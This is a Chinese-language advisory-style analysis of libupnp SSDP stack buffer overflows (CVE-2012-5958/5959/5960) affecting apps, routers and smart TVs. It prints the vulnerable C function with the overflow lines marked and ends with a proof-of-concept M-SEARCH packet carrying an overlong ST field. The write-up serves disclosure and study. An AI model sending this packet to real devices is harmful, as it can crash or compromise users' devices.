该漏洞存在于UPnP™设备的便携式SDK中,也叫做 libupnp。这个库是用来实现媒体播放(DLAN)或者NAT地址转换(UPnP IGD)。智能手机上的应用程序可用这些功能播放媒体文件或者利用用户的家庭网络连接到其他的设备。

事实上,这些漏洞早在2012年12月份就已经修复了,然而仍然有很多app在使用存在漏洞的老版本SDK。统计发现有547个应用还在使用老版本的 libupnp,其中326个可从谷歌Play store中下载到,包括Netflix和腾讯QQ音乐。这些都是非常流行的应用,用户达百万,也就是说有数百万的用户还存在被攻击的可能性。另外,除了移动设备,路由器和智能电视也在之列。

漏洞利用

该漏洞存在于 libupnp库处理简单服务发现协议(SSDP)包过程中。该协议是 Universal Plug N’ Play (UPnP)标准的部分。在处理进程中会出现堆栈溢出,并且需要UDP1900端口打开。

一个精心制作的包可造成缓冲区溢出,如下图中的代码,TempBuf 缓冲可溢出,并造成死机。

进一步的研究发现,它不仅能造成死机,还可以在受害者设备上运行任意代码。如此以来,攻击者便可能会完全掌控受害者设备。

漏洞代码如下:

// version 1.6.17

 // cmd变量接收外部输入

 // 结构体Evt包含多个固定长度的缓冲区

 int unique_service_name(char *cmd, SsdpEvent *Evt)

{

    char TempBuf[COMMAND_LEN];

    char *TempPtr = NULL;

    char *Ptr = NULL;

    char *ptr1 = NULL;

    char *ptr2 = NULL;

    char *ptr3 = NULL;

    int CommandFound = 0;

    size_t n = (size_t)0;

    if (strstr(cmd, "uuid:schemas") != NULL)

    {

        ptr1 = strstr(cmd, ":device");

        if (ptr1 != NULL)

            ptr2 = strstr(ptr1 + 1, ":");

        else

            return -1;

        if (ptr2 != NULL)

            ptr3 = strstr(ptr2 + 1, ":");

        else

            return -1;

        if (ptr3 != NULL)

        {

            if (strlen("uuid:") + strlen(ptr3 + 1) >= sizeof(Evt->UDN))

                return -1;

            snprintf(Evt->UDN, sizeof(Evt->UDN), "uuid:%s", ptr3 + 1);

        }

        else

            return -1;

        ptr1 = strstr(cmd, ":");

        if (ptr1 != NULL)

        {

            n = (size_t)ptr3 - (size_t)ptr1;

            strncpy(TempBuf, ptr1, n);                            // CVE-2012-5958

            TempBuf[n] = '\0';

            if (strlen("urn") + strlen(TempBuf) >= sizeof(Evt->DeviceType))

                return -1;

            snprintf(Evt->DeviceType, sizeof(Evt->DeviceType), "urn%s", TempBuf);

        }

        else

            return -1;

        return 0;

    }

    if ((TempPtr = strstr(cmd, "uuid")) != NULL)

    {

        if ((Ptr = strstr(cmd, "::")) != NULL)

        {

            n = (size_t)Ptr - (size_t)TempPtr;

            strncpy(Evt->UDN, TempPtr, n);                        // CVE-2012-5959

            Evt->UDN[n] = '\0';

        }

        else

        {

            memset(Evt->UDN, 0, sizeof(Evt->UDN));

            strncpy(Evt->UDN, TempPtr, sizeof(Evt->UDN) - 1);

        }

        CommandFound = 1;

    }

    if (strstr(cmd, "urn:") != NULL && strstr(cmd, ":service:") != NULL)

    {

        if ((TempPtr = strstr(cmd, "urn")) != NULL)

        {

            memset(Evt->ServiceType, 0, sizeof(Evt->ServiceType));

            strncpy(Evt->ServiceType, TempPtr, sizeof(Evt->ServiceType) - 1);

            CommandFound = 1;

        }

    }

    if (strstr(cmd, "urn:") != NULL && strstr(cmd, ":device:") != NULL)

    {

        if ((TempPtr = strstr(cmd, "urn")) != NULL)

        {

            memset(Evt->DeviceType, 0, sizeof(Evt->DeviceType));

            strncpy(Evt->DeviceType, TempPtr, sizeof(Evt->DeviceType) - 1);

            CommandFound = 1;

        }

    }

    if ((TempPtr = strstr(cmd, "::upnp:rootdevice")) != NULL)

    {

        /* Everything before "::upnp::rootdevice" is the UDN. */

        if (TempPtr != cmd)

        {

            n = (size_t)TempPtr - (size_t)cmd;

            strncpy(Evt->UDN, cmd, n);                            // CVE-2012-5960

            Evt->UDN[n] = 0;

            CommandFound = 1;

        }

    }

    if (CommandFound == 0)

        return -1;

    return 0;

}

Poc脚本如下:

M-SEARCH * HTTP/1.1

 Host:239.255.255.250:1900

ST:uuid:schemas:device:AAAA[…]AAAA:anything

Man:"ssdp:discover"

MX:3

libUpnp缓冲区溢出、拒绝服务等漏洞分析的更多相关文章

  1. Kali学习笔记21:缓冲区溢出实验(漏洞发现)

    上一篇文章,我已经做好了缓冲区溢出实验的准备工作: https://www.cnblogs.com/xuyiqing/p/9835561.html 下面就是Kali虚拟机对缓冲区溢出的测试: 已经知道 ...

  2. Android APP通用型拒绝服务、漏洞分析报告

    点评:记得曾经有段时间很多SRC平台被刷了大量APP本地拒绝服务漏洞(目前腾讯金刚审计系统已经可检测此类漏洞),移动安全团队发现了一个安卓客户端的通用型拒绝服务漏洞,来看看他们的详细分析吧. 0xr0 ...

  3. 4 CVE-2012-0158 漏洞分析

    操作系统:Windows7 32位 专业版 Office:2003sp3_20120218.exe 工具:OD和IDA 1.漏洞的本质:程序编写时未对内存拷贝函数的长度参数进行足够严谨的验证,造成的堆 ...

  4. Kali学习笔记22:缓冲区溢出漏洞利用实验

    实验机器: Kali虚拟机一台(192.168.163.133) Windows XP虚拟机一台(192.168.163.130) 如何用Kali虚拟机一步一步“黑掉”这个windowsXP虚拟机呢? ...

  5. 2017-2018-2 20179215《网络攻防实践》seed缓冲区溢出实验

    seed缓冲区溢出实验 有漏洞的程序: /* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our tas ...

  6. CVE2016-8863libupnp缓冲区溢出漏洞原理分析及Poc

    1.libupnp问题分析: (1)问题简述: 根据客户给出的报告,通过设备安装的libupnp软件版本来判断,存在缓冲区溢出漏洞:CVE-2016-8863. (2)漏洞原理分析: 该漏洞发生在up ...

  7. CVE-2011-0104 Microsoft Office Excel缓冲区溢出漏洞 分析

    漏洞简述   Microsoft Excel是Microsoft Office组件之一,是流行的电子表格处理软件.        Microsoft Excel中存在缓冲区溢出漏洞,远程攻击者可利用此 ...

  8. CVE-2010-2883Adobe Reader和Acrobat CoolType.dll栈缓冲区溢出漏洞分析

       Adobe Acrobat和Reader都是美国Adobe公司开发的非常流行的PDF文件阅读器. 基于Window和Mac OS X的Adobe Reader和Acrobat 9.4之前的9.x ...

  9. cve-2010-3333 Microsoft Office Open XML文件格式转换器栈缓冲区溢出漏洞 分析

    用的是泉哥的POC来调的这个漏洞 0x0 漏洞调试    Microsoft Office Open XML文件格式转换器栈缓冲区溢出漏洞 Microsoft Office 是微软发布的非常流行的办公 ...

随机推荐

  1. 织梦调用文章 ID (来源:百度知道)

    问:{dede:field.id /} {dede:channel type='son' orderby='sortrank'} <a href='[field:typeurl/]'>&l ...

  2. make dep

    在配置好内核后就是编译内核了,在编译之前首先应该执行make dep命令建立好依赖关系,该命令将会修改linux中每个子目录下的.depend文件,该文件包含了该目录下每个目标文件所需要的头文件(绝对 ...

  3. Qt5布局管理(一)——QSplitter分割窗口类

    转载:LeeHDsniper 概述 本文首先通过三个实例分别介绍Qt5的分割窗口QSplitter类.停靠窗口QDockWidget类.堆栈窗体QStackedWidget类,然后介绍布局管理器的使用 ...

  4. matplot 代码实例

    matplot 代码实例 #!/usr/bin/env python # coding=utf-8 import numpy as np import matplotlib.pyplot as plt ...

  5. linux 下 rpc python 实例之使用XML-RPC进行远程文件共享

    这是个不错的练习,使用python开发P2P程序,或许通过这个我们可以自己搞出来一个P2P下载工具,类似于迅雷.XML-RPC是一个远程过程调用(remote procedure call,RPC)的 ...

  6. centos 7.5 安装mongodb

    MongoDB安装和启动 从官网下载最新对应的版本然后解压,本文以3.6.9为例,将文件拷贝到opt目录下,然后解压: [root@localhost opt]# tar zxvf mongodb-l ...

  7. 长沙雅礼中学集训-------------------day1(内含day0)

    day0: 首先,请允许我吐槽一下: 1.那些一个人住一个标准房的人您们真的是#@**¥&%……#*()%……*()@Q$&. 2.感谢那些一个人住一个标准间的人,要不然我们也找不到这 ...

  8. CentOS修改TimeZone

    查看: date -R +0800   修改: sudo rm -rf /etc/localtime sudo cp /usr/share/zoneinfo/America/Los_Angeles / ...

  9. Map 合并

    比如说 qq.com 100 163.com  90 QQ.COM 10 Qq.Com  5 …… 如果统计的话,需要忽略大小写的,即 QQ邮箱总共是100+10+5,怎么写? 其实这个应该不难的,就 ...

  10. 如何对hashmap按value值排序

    http://bbs.csdn.net/topics/90321713 这个帖子中没有我想要的答案,treemap是根据key排序的,想以value排序,那么可以key,value互换一下,不过这样的 ...